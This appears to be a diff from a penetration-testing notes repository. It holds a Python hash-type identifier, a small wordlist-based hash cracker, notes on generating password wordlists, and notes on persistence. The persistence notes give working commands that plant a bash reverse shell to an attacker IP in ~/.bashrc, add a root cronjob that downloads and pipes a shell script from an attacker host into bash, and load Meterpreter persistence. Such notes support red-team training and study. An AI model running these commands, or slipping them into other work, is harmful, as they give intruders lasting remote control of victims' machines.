 def MD5HMACWordpress(hash):
    hs='3f47886719268dfa83468630948228f6'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106140")
 def NTLM(hash):
    hs='cc348bace876ea440a28ddaeb9fd3550'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106029")
 def RAdminv2x(hash):
    hs='baea31c728cbf0cd548476aa687add4b'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106027")
 def RipeMD128(hash):
    hs='4985351cd74aff0abc5a75a0c8a54115'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106180")
 def RipeMD128HMAC(hash):
    hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106185")
 def SNEFRU128(hash):
    hs='4fb58702b617ac4f7ca87ec77b93da8a'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106200")
 def SNEFRU128HMAC(hash):
    hs='59b2b9dcc7a9a7d089cecf1b83520350'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106205")
 def Tiger128(hash):
    hs='c086184486ec6388ff81ec9f23528727'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106220")
 def Tiger128HMAC(hash):
    hs='c87032009e7c4b2ea27eb6f99723454b'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106225")
 def md5passsalt(hash):
    hs='5634cc3b922578434d6e9342ff5913f7'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106240")
 def md5saltmd5pass(hash):
    hs='245c5763b95ba42d4b02d44bbcd916f1'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106260")
 def md5saltpass(hash):
    hs='22cc5ce1a1ef747cd3fa06106c148dfa'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106280")
 def md5saltpasssalt(hash):
    hs='469e9cdcaff745460595a7a386c4db0c'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106300")
 def md5saltpassusername(hash):
    hs='9ae20f88189f6e3a62711608ddb6f5fd'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106320")
 def md5saltmd5pass(hash):
    hs='aca2a052962b2564027ee62933d2382f'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106340")
 def md5saltmd5passsalt(hash):
    hs='de0237dc03a8efdf6552fbe7788b2fdd'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106360")
 def md5saltmd5passsalt(hash):
    hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106380")
 def md5saltmd5saltpass(hash):
    hs='d8f3b3f004d387086aae24326b575b23'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106400")
 def md5saltmd5md5passsalt(hash):
    hs='81f181454e23319779b03d74d062b1a2'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106420")
 def md5username0pass(hash):
    hs='e44a60f8f2106492ae16581c91edb3ba'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106440")
 def md5usernameLFpass(hash):
    hs='654741780db415732eaee12b1b909119'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106460")
 def md5usernamemd5passsalt(hash):
    hs='954ac5505fd1843bbb97d1b2cda0b98f'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106480")
 def md5md5pass(hash):
    hs='a96103d267d024583d5565436e52dfb3'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106500")
 def md5md5passsalt(hash):
    hs='5848c73c2482d3c2c7b6af134ed8dd89'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106520")
 def md5md5passmd5salt(hash):
    hs='8dc71ef37197b2edba02d48c30217b32'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106540")
 def md5md5saltpass(hash):
    hs='9032fabd905e273b9ceb1e124631bd67'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106560")
 def md5md5saltmd5pass(hash):
    hs='8966f37dbb4aca377a71a9d3d09cd1ac'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106580")
 def md5md5usernamepasssalt(hash):
    hs='4319a3befce729b34c3105dbc29d0c40'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106600")
 def md5md5md5pass(hash):
    hs='ea086739755920e732d0f4d8c1b6ad8d'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106620")
 def md5md5md5md5pass(hash):
    hs='02528c1f2ed8ac7d83fe76f3cf1c133f'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106640")
 def md5md5md5md5md5pass(hash):
    hs='4548d2c062933dff53928fd4ae427fc0'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106660")
 def md5sha1pass(hash):
    hs='cb4ebaaedfd536d965c452d9569a6b1e'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106680")
 def md5sha1md5pass(hash):
    hs='099b8a59795e07c334a696a10c0ebce0'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106700")
 def md5sha1md5sha1pass(hash):
    hs='06e4af76833da7cc138d90602ef80070'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106720")
 def md5strtouppermd5pass(hash):
    hs='519de146f1a658ab5e5e2aa9b7d2eec8'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("106740")
 def LineageIIC4(hash):
    hs='0x49a57f66bd3d5ba6abda5579c264a0e4'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0:
        jerar.append("107080")
 def MD5phpBB3(hash):
    hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0:
        jerar.append("107040")
 def MD5Unix(hash):
    hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0:
        jerar.append("107060")
 def MD5Wordpress(hash):
    hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0:
        jerar.append("107020")
 def MD5APR(hash):
    hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0:
        jerar.append("108020")
 def Haval160(hash):
    hs='a106e921284dd69dad06192a4411ec32fce83dbb'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109100")
 def Haval160HMAC(hash):
    hs='29206f83edc1d6c3f680ff11276ec20642881243'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109200")
 def MySQL5(hash):
    hs='9bb2fb57063821c762cc009f7584ddae9da431ff'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109040")
 def MySQL160bit(hash):
    hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0:
        jerar.append("109060")
 def RipeMD160(hash):
    hs='dc65552812c66997ea7320ddfb51f5625d74721b'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109120")
 def RipeMD160HMAC(hash):
    hs='ca28af47653b4f21e96c1235984cb50229331359'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109180")
 def SHA1(hash):
    hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109020")
 def SHA1HMAC(hash):
    hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109140")
 def SHA1MaNGOS(hash):
    hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109220")
 def SHA1MaNGOS2(hash):
    hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109240")
 def Tiger160(hash):
    hs='c086184486ec6388ff81ec9f235287270429b225'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109080")
 def Tiger160HMAC(hash):
    hs='6603161719da5e56e1866e4f61f79496334e6a10'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109160")
 def sha1passsalt(hash):
    hs='f006a1863663c21c541c8d600355abfeeaadb5e4'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109260")
 def sha1saltpass(hash):
    hs='299c3d65a0dcab1fc38421783d64d0ecf4113448'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109280")
 def sha1saltmd5pass(hash):
    hs='860465ede0625deebb4fbbedcb0db9dc65faec30'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109300")
 def sha1saltmd5passsalt(hash):
    hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109320")
 def sha1saltsha1pass(hash):
    hs='58714327f9407097c64032a2fd5bff3a260cb85f'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109340")
 def sha1saltsha1saltsha1pass(hash):
    hs='cc600a2903130c945aa178396910135cc7f93c63'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109360")
 def sha1usernamepass(hash):
    hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109380")
 def sha1usernamepasssalt(hash):
    hs='00025111b3c4d0ac1635558ce2393f77e94770c5'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109400")
 def sha1md5pass(hash):
    hs='fa960056c0dea57de94776d3759fb555a15cae87'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("1094202")
 def sha1md5passsalt(hash):
    hs='1dad2b71432d83312e61d25aeb627593295bcc9a'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109440")
 def sha1md5sha1pass(hash):
    hs='8bceaeed74c17571c15cdb9494e992db3c263695'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109460")
 def sha1sha1pass(hash):
    hs='3109b810188fcde0900f9907d2ebcaa10277d10e'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109480")
 def sha1sha1passsalt(hash):
    hs='780d43fa11693b61875321b6b54905ee488d7760'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109500")
 def sha1sha1passsubstrpass03(hash):
    hs='5ed6bc680b59c580db4a38df307bd4621759324e'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109520")
 def sha1sha1saltpass(hash):
    hs='70506bac605485b4143ca114cbd4a3580d76a413'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109540")
 def sha1sha1sha1pass(hash):
    hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109560")
 def sha1strtolowerusernamepass(hash):
    hs='79f575543061e158c2da3799f999eb7c95261f07'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("109580")
 def Haval192(hash):
    hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("110040")
 def Haval192HMAC(hash):
    hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("110080")
 def Tiger192(hash):
    hs='c086184486ec6388ff81ec9f235287270429b2253b248a70'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("110020")
 def Tiger192HMAC(hash):
    hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("110060")
 def MD5passsaltjoomla1(hash):
    hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
        jerar.append("112020")
 def SHA1Django(hash):
    hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0:
        jerar.append("113020")
 def Haval224(hash):
    hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("114040")
 def Haval224HMAC(hash):
    hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("114080")
 def SHA224(hash):
    hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("114020")
 def SHA224HMAC(hash):
    hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("114060")
 def SHA256(hash):
    hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("115020")
 def SHA256HMAC(hash):
    hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("115120")
 def Haval256(hash):
    hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("115040")
 def Haval256HMAC(hash):
    hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("115140")
 def GOSTR341194(hash):
    hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("115060")
 def RipeMD256(hash):
    hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("115080")
 def RipeMD256HMAC(hash):
    hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("115160")
 def SNEFRU256(hash):
    hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("115100")
 def SNEFRU256HMAC(hash):
    hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("115180")
 def SHA256md5pass(hash):
    hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("115200")
 def SHA256sha1pass(hash):
    hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("115220")
 def MD5passsaltjoomla2(hash):
    hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
        jerar.append("116020")
 def SAM(hash):
    hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0:
        jerar.append("116040")
 def SHA256Django(hash):
    hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0:
        jerar.append("117020")
 def RipeMD320(hash):
    hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("118020")
 def RipeMD320HMAC(hash):
    hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("118040")
 def SHA384(hash):
    hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("119020")
 def SHA384HMAC(hash):
    hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("119040")
 def SHA256s(hash):
    hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0:
        jerar.append("120020")
 def SHA384Django(hash):
    hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0:
        jerar.append("121020")
 def SHA512(hash):
    hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("122020")
 def SHA512HMAC(hash):
    hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("122060")
 def Whirlpool(hash):
    hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("122040")
 def WhirlpoolHMAC(hash):
    hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9'
    if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
        jerar.append("122080")
 print(logo)
 try:
    first = str(argv[1])
 except:
    first = None
 while True:
    try:
        jerar=[]
        print("-"*50)
        if first:
            h = first
        else:
            h = input(" HASH: ")
        ADLER32(h); CRC16(h); CRC16CCITT(h); CRC32(h); CRC32B(h); DESUnix(h); DomainCachedCredentials(h); FCS16(h); GHash323(h); GHash325(h); GOSTR341194(h); Haval128(h); Haval128HMAC(h); Haval160(h); Haval160HMAC(h); Haval192(h); Haval192HMAC(h); Haval224(h); Haval224HMAC(h); Haval256(h); Haval256HMAC(h); LineageIIC4(h); MD2(h); MD2HMAC(h); MD4(h); MD4HMAC(h); MD5(h); MD5APR(h); MD5HMAC(h); MD5HMACWordpress(h); MD5phpBB3(h); MD5Unix(h); MD5Wordpress(h); MD5Half(h); MD5Middle(h); MD5passsaltjoomla1(h); MD5passsaltjoomla2(h); MySQL(h); MySQL5(h); MySQL160bit(h); NTLM(h); RAdminv2x(h); RipeMD128(h); RipeMD128HMAC(h); RipeMD160(h); RipeMD160HMAC(h); RipeMD256(h); RipeMD256HMAC(h); RipeMD320(h); RipeMD320HMAC(h); SAM(h); SHA1(h); SHA1Django(h); SHA1HMAC(h); SHA1MaNGOS(h); SHA1MaNGOS2(h); SHA224(h); SHA224HMAC(h); SHA256(h); SHA256s(h); SHA256Django(h); SHA256HMAC(h); SHA256md5pass(h); SHA256sha1pass(h); SHA384(h); SHA384Django(h); SHA384HMAC(h); SHA512(h); SHA512HMAC(h); SNEFRU128(h); SNEFRU128HMAC(h); SNEFRU256(h); SNEFRU256HMAC(h); Tiger128(h); Tiger128HMAC(h); Tiger160(h); Tiger160HMAC(h); Tiger192(h); Tiger192HMAC(h); Whirlpool(h); WhirlpoolHMAC(h); XOR32(h); md5passsalt(h); md5saltmd5pass(h); md5saltpass(h); md5saltpasssalt(h); md5saltpassusername(h); md5saltmd5pass(h); md5saltmd5passsalt(h); md5saltmd5passsalt(h); md5saltmd5saltpass(h); md5saltmd5md5passsalt(h); md5username0pass(h); md5usernameLFpass(h); md5usernamemd5passsalt(h); md5md5pass(h); md5md5passsalt(h); md5md5passmd5salt(h); md5md5saltpass(h); md5md5saltmd5pass(h); md5md5usernamepasssalt(h); md5md5md5pass(h); md5md5md5md5pass(h); md5md5md5md5md5pass(h); md5sha1pass(h); md5sha1md5pass(h); md5sha1md5sha1pass(h); md5strtouppermd5pass(h); sha1passsalt(h); sha1saltpass(h); sha1saltmd5pass(h); sha1saltmd5passsalt(h); sha1saltsha1pass(h); sha1saltsha1saltsha1pass(h); sha1usernamepass(h); sha1usernamepasssalt(h); sha1md5pass(h); sha1md5passsalt(h); sha1md5sha1pass(h); sha1sha1pass(h); sha1sha1passsalt(h); sha1sha1passsubstrpass03(h); sha1sha1saltpass(h); sha1sha1sha1pass(h); sha1strtolowerusernamepass(h)
        if len(jerar)==0:
            print("\n Not Found.")
        elif len(jerar)>2:
            jerar.sort()
            print("\nPossible Hashs:")
            print("[+] "+str(algorithms[jerar[0]]))
            print("[+] "+str(algorithms[jerar[1]]))
            print("\nLeast Possible Hashs:")
            for a in range(int(len(jerar))-2):
                print("[+] "+str(algorithms[jerar[a+2]]))
        else:
            jerar.sort()
            print("\nPossible Hashs:")
            for a in range(len(jerar)):
                print("[+] "+str(algorithms[jerar[a]]))
        first = None
    except KeyboardInterrupt:
        print("\n\n\tBye!")
        exit()
--- a/Hashes/Scripts/hash_cracker.py
+++ b/Hashes/Scripts/hash_cracker.py
@ -0,0 +1,20 @@
 #!/usr/bin/env python
 import hashlib
 import pyfiglet
 print(pyfiglet.figlet_format("md5 cracker"))
 wordlist_location = str(input("Wordlist file location: "))
 hash_input = str(input("Enter hash to be cracked: "))
 with open(wordlist_location, 'rb') as _f:
    for line in _f.readlines():
        line = line.strip()
        hash_ob = hashlib.sha256(line)
        #hash_ob = hashlib.md5(line)
        hashed_pass = hash_ob.hexdigest()
        print(line)
        if hashed_pass == hash_input:
            print("Password found: " + line.decode())
            exit(0)
--- a/Hashes/Wordlists.md
+++ b/Hashes/Wordlists.md
@ -0,0 +1,48 @@
 # Generate Wordlists
 * [username_generator](https://github.com/therodri2/username_generator.git)
 * [CeWL](../enumeration/CeWL/README.md)
 * [Mentalist](https://github.com/sc0tfree/mentalist.git)
 * [lyricpass](https://github.com/initstring/lyricpass.git)
 * [pnwgen phonenumbers](https://github.com/toxydose/pnwgen.git)
 ## Cupp
 * [cupp](https://github.com/Mebus/cupp.git)
    * Interactive dialogue via `cupp.py -i`
    * Wordlistdownload via `cupp.py -l`
    * Connections to alecto DB via `-a`
 ## crunch
 ```sh
 crunch <minlen> <maxlen> <charPool> -o <output.file>
 ```
 * Option `-t` specifies variable characters
    * `@`, lower case alpha characters
    * `,`, upper case alpha characters
    * `%`, numeric characters
    * `^`, special characters including space
 ```sh
 crunch 8 8 -t passw%%rd
 ```
 ## ttpassgen 
 * [ttpassgen](https://github.com/tp7309/TTPassGen.git)
 * Generate lists from the ground up
 * `pip install ttpassgen`
 ```sh
 ttpassgen --rule '[?d]{6:6:*}' 6digitpins.txt
 ```
 ```sh
 ttpassgen --rule '[?l]{1:5:*}' all_letter_combinations.txt
 ```
 ```sh
 ttpassgen --dictlist "in.txt,in2.txt" --rule '$0[_]?$1' -s " " out.txt
 ```
 # exrex
 * Generate all possible outcomes from regex string
--- a/Persistence/bashrc.md
+++ b/Persistence/bashrc.md
@ -0,0 +1,8 @@
 # Bashrc Bogus
 ## Add Reverse Shell
 ```sh
 echo 'bash -c "bash -i >& /dev/tcp/<attacker-IP>/<attacker-Port> 0>&1"' >> ~/.bashrc
 ```
--- a/Persistence/crontab.md
+++ b/Persistence/crontab.md
@ -0,0 +1,15 @@
 # Cronjobs
 * `crontab -l`
 * `cat /etc/crontab`
 ## Add Cronjob
 * Add line
 ```sh
 * *   * * * root curl http://<attacker-IP>:8000/shell.sh | bash
 ``` 
    * Shell content
    ```sh
    bash -c "bash -i >& /dev/tcp/<attacker-IP>/<attacker-Port> 0&1"
    ```  
--- a/Persistence/meterpreter.md
+++ b/Persistence/meterpreter.md
@ -0,0 +1,6 @@
 # Meterpreter Persistence
 ## Load shell on system startup
 ```sh
 run persistence -X
 ```
--- a/Persistence/persistence.md
+++ b/Persistence/persistence.md
@ -0,0 +1,323 @@
 # Persistence
 * Gain through
    * Startup folder persistence
    * Editing registry keys
    * Scheduled tasks
    * SUID
